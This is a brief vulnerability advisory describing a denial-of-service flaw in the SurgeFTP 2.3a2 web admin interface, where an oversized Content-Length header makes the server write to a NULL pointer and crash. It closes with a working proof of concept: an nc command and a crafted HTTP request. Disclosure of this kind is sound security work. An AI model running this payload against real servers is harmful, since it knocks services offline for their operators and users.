|
|
| |
| SurgeFTP is "a commercial FTP server which supports also SSL/TLS and has a web interface for remote administration". A vulnerability in the way SurgeFTP's web management interface handles invalid Content-Length values allows remote attackers to cause it to crash. |
| |
Credit:
The information has been provided by Luigi Auriemma.
|
| |
Vulnerable Systems:
* SurgeFTP version 2.3a2
When a Content-Length parameter is received from the client, SurgeFTP tries to allocate the amount of memory (max 2147483647 bytes) specified in this field and then copies the data in the resulted new buffer. The problem is in the lack of checks on the result of the allocation which leads to the crash of the entire server during the copying of the data to a NULL pointer if that amount of memory cannot be allocated.
Exploit:
Send the following content using the following command:
nc SERVER 7021 -v -v < surgeftpizza.txt
Content:
GET / HTTP/1.0
Content-Length: 2147483647
boom
|
|
|
|
|
